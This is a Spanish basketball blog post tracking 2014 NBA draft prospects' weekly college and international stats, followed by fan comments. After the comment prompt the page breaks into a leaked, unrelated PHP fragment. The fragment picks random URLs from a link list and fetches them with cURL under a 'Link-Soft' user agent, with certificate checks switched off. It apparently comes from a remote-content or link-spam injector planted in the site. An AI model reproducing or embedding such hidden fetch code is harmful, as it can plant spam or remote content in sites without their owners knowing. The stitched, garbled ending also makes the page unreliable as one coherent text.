Seguimiento del draft 2014: Semana del 18 al 24 de enero

25 de January de 2014 por Viva_Dirk

La expectación que ha levantado el draft del 2014 nos ha empujado ha inaugurar esta sección. En ella os iremos informando semanalmente de lo ocurrido en la NCAA, teniendo especial atención en los nombres propios de esta generación.

Nos metemos directamente en harina con lo ocurrido el pasado sábado día 18. Hubo muchos partidos por lo que nos centraremos en los jugadores que suenan para el draft y en alguna gran actuación. Joel Embiid y Marcus Smart protagonizaron el duelo de la jornada, con ambos rozando el triple-doble. El center hizo un 13-11 y 8 tapones mientras que el base de Oklahoma State dejóun a tarjeta de 16-10-9 y 4 robos aunque con bajos porcentajes de tiro. Mala actuación, en cambio, de Andrew Wiggins que estuvo cerca de costar el partido a Kansas. Jabari Parker anotó 23 puntos  y capturó 7 rebotes en la victoria de Duke frente los Wolfpack de TJ Warren (suena sobre los puestos 20-25 de 1ª ronda) que hizo 23-8. Asistimos al mejor partido de la temporada de Andrew Harrison con 26 puntos bien secundado por los 18 de Julius Randley ante los que nada sirvieron los 20 puntos y 15 rebotes de Jarnell Stokes (2ª ronda).  Por su parte, Gary Harris completó otro gran partido con un 23-5-4 y los Spartans volvieron a ganar. Buen partido también de Zach LaVine con 15-6-3 aunque claramente eclipsado por Kyle Anderson que se fue hasta unos impresionantes 28-7-7 con 5 triples sin fallo. Atentos a este sophomore que los mocks sitúan a principios de 2ª ronda. De los grandes nombres nos quedan destacar los 21 puntos y 7 rebotes de Doug McDermott. Lo habitual, vamos. 

De fuera de la zona más noble de los mocks hemos de destacar la buena actuación de Nik Stauskas que cuajó una completa actuación (23-4-4) ante  Sam Dekker que se quedó en 10-10 con bajos porcentajes. Ambos suenan para la 1ª ronda. Montrezl Harrell y Russ Smith le ganaron la partida a Shabazz Napier. El ala-pívot consiguió otro doble con 18 puntos y 13 rebotes y además puso 3 tapones. Smith se fue a los 23 puntos y Napier a los 30.

El domingo nos dejaba un solo partido sin grandes nombres. Del Iowa – Minnesota nos fijamos en el escolta senior de los Hawkeyes Devyn Marble que aparece en algunos mocks mediada la segunda ronda. Su partido casi calca su temporada: 16 puntos con porcentajes pobres y escasa aportación en otras facetas.

El lunes llegaba con otro partido de Kansas. Andrew Wiggins jugó 38 minutos en los que anotó 17 puntos y capturó 7 rebotes pero perdió 4 balones. Hay que destacar que 10 de sus puntos llegaron desde el tiro libre y sobretodo que solo intentó 7 tiros de campo. Joel Embiid, por su parte, anotó 12 puntos en 26 minutos con una aportación baja en el resto de facetas pero con un interesante 4 de 4 en libres. Su compañero de equipo Wayne Selden confirmó que sigue en un pequeño bache y cuajó el tercer mal partido consecutivo. A ellos se enfrentaban el peculiar center de segundo año Isaiah Austin (que acabó con 16 puntos con un 4 de 8 en triples y que actualmente está colocado entre los picks 25 y 35), y su compañero Cory Jefferson (que también anotó 16 puntos y que suena para la zona media de la segunda ronda). El mismo día pudimos asistir a una nueva exhibición de Doug McDermott que llevó a su equipo a la victoria frente a una potencia como Vilanova. 23 puntos, 5 rebotes y 3 asistencias con excelentes porcentajes fue el bagaje de este jugón.

El martes Gary Harris y Noah Vonleh dirimieron un bonito duelo. El escolta de los Spartans se fue hasta los 24 puntos con 8 de 13 en tiros y robó 5 balones mientras que el ala-pívot de Indiana sumaba 13 puntos y 13 rebotes con 6 de 8 en tiros. En los Spartans es baja desde el 7 de enero el senior Andreian Payne proyectado en 1ª ronda. Por su parte, Julius Randle y James Young lideraron a Kentucky a una cómoda victoria con 13-11 del primero y 15-7 del segundo. Decepcionantes actuaciones en cambio de los hermanos Harrison y Willie Cauley-Stein.

Jabari Parker nos dejaba el miércoles un 17-15 con 3 tapones y 4 pérdidas y junto a su compañero Rodney Hood  (12-6-3) llevó a Duke a la victoria ante los Harricans. Nik Stauskas también lideró a los suyos al triunfo con un 26-5-5, secundado por Glenn Robinson III con 14-9. Montrezl Harrell hizo 14-10 en una victoria por casi 40 de Lousiville sobre South Florida. En cambio Sam Dekker no pudo evitar la derrota pese a sus 20 puntos. El sophomore de San Diego State, a día de hoy fuera de los mocks, Winston Shepard se dejó ver con un 12-9-6.

El jueves, LaQuinton Ross, jugador de Ohio State, nos dejaba 18 puntos con una buena serie de tiro. El ala-pívot Shaq Goodwin hizo 20-6, aunque difícilmente le veremos presentarse este año al draft. El nombre del día era el de Aaron Gordon pero el de Arizona cuajó un partido discreto con 12-4-3. El jugador de último año Sean Kilpatrick anotó 19 puntos. Probablemente le veremos hacer carrera en Europa.

Vamos ahora con lo que hicieron los jugadores internacionales.

Dario Saric tuvo un partido movido con 18 puntos, 9 rebotes, 4 robos, 2 tapones y 7 pérdidas para una valoración de 26. El center Clint Capela, del Chalon francés, hizo un 18-9 con 3 tapones y un 7 de 7 en tiros. Jusuf Nurkic, pívot bosnio de 19 años del Cedevita, anotó 13 puntos. Bogdan Bogdanovic dejó una hoja de 11-5-4 con 3 robos. El base serbio Vasilije Micic anotó 15 puntos, repartió 6 asistencias y perdió 4 balones. El center del gran Canari, Walter Tavares se quedó en 4 puntos pero capturó 11 rebotes y puso 3 tapones. Finalmente, Alessandro Gentile hizo un 13-5-4 y robó 3 balones con una gran serie de tiro.

Comenta

7 comentarios a esta entrada

  1. Denise dice:
    #1

    Me gusta esta sección, si señor.
    Ahora que están de moda los bases de 2 metros, ¿os gusta Tomas Satoransky? A mi me encanta, dirige bien, anota, tiene fisico, es un gran penetrador, juega con inteligencia y aún solo tiene 22 años. Está drafteado por los Wizards y ahora mismo creo que estaría más que capacitado para ir a la NBA el año que viene y darle 12-15 buenos minutos de descanso a JohnWall ó incluso jugar algunos minutos con él como SG.

      Citar

  2. Ruxixon dice:
    #2

    Tengo que decir que la temporada de los Wolverines es excepcional considerando la baja de Trey Burke por el draft y la lesión de McGary en la espalda.Cabría esperarse un batacazo pero el equipo ha respondido hasta la fecha y ya van 6-0 en la Big Ten.Sobre el papel era Glen Robinson quien tenía que haber acaparado el protagonismo en el equipo -en este aspecto un poco decepcionante el chaval- pero aparece aquí Nick Stauskas,alma y el corazón de Michigan.

    Curiosa la disparidad en los mocks a la hora de situar a este jugador.En nbadraft lo colocan en segunda ronda del draft de 2015 mientras que en draftexpress figura en un pick 25 del próximo draft.

      Citar

  3. Ruxixon dice:
    #3

    Buen trabajo por cierto 😉

      Citar

  4. jhc dice:
    #4

    Impresionante trabajo gracias Dirk

      Citar

  5. Arivas dice:
    #5

    Grande Viva.

    Parece que Parker paso el bajocillo de principio de año y vuelve a marcarse numerazos. Y embiid ya con todos los focos sobre el sigue dejando muestras de su potencial. Como le de por irse a 20 puntos algun partido no le baja del 1 nadie.

      Citar

  6. Arivas dice:
    #6

    Por cierto hoy jornada con muchos partidos y muchos de los candidatos a loteria en juego.

      Citar

  7. Denise dice:
    #7

    Cómoda victoria de Duke ante Florida State con Jabari Parker que aún estando discreto ha sido el mejor del choque (14 ptos, 14 rebotes, 3/14 en tiros) bien secundado por Rodney Hood (18-9 pero 4/12 en tiros).
    El tercer Plumlee juega en este equipo, y a pesar de ser reserva y tener un rol muy secundario, me ha gustado bastante y se ha hinchado a coger rebotes ofensivos. Aunque este creo que no entra en las quinielas del Draft, no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>